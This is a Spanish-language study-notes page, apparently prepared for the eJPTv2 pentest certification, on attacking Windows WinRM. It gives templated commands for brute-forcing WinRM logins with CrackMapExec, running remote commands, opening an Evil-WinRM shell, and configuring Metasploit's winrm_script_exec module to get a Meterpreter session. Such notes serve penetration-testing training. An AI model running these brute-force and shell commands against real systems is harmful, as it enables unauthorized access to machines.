WinRM :: HackAlex

┌─[ WinRM ]──────────────────────────────────────────────────────────────────────────────────────────
│ user: Alejandro Lopez Aguilar
└ path: /apuntes/ejptv2/explotacion/windows/winrm/

:: 🔐 Fuerza bruta con Crackmapexec

┌─[ code ]──────────────────────────────────────────────────────────────────────────────────────────
crackmapexec winrm <IP> -u <user(administrator)/lista_usuarios.txt> -p <diccionario de contraseñas>
└───────────────────────────────────────────────────────────────────────────────────────────────────

:: ▸ Ejecución de comandos con crackmapexec

┌─[ code ]──────────────────────────────────────────────────────────────────────────────────────────
crackmapexec winrm <IP> -u <usuario> -p <contraseña> -x <command> (whoami)
└───────────────────────────────────────────────────────────────────────────────────────────────────

:: ▸ Consola interactiva con Evil-WinRM (PowerShell)

┌─[ code ]──────────────────────────────────────────────────────────────────────────────────────────
evil-winrm -u <user> -p ‘<contraseña>’ -i <IP>
└───────────────────────────────────────────────────────────────────────────────────────────────────

:: ▸ Obtener consola Meterpreter con Metasploit

Usamos el módulo: exploit/windows/winrm/winrm_script_exec

┌─[ code ]──────────────────────────────────────────────────────────────────────────────────────────
use exploit/windows/winrm/winrm_script_exec

set RHOSTS <IP víctma>
set RPORT <Puerto de winrm vícitma>
set LPORT <Local Port>
set FORCE_VBS true
set USERNAME <user>
set PASSWORD <password>
exploit
└───────────────────────────────────────────────────────────────────────────────────────────────────


ret <volume_4>  <indice>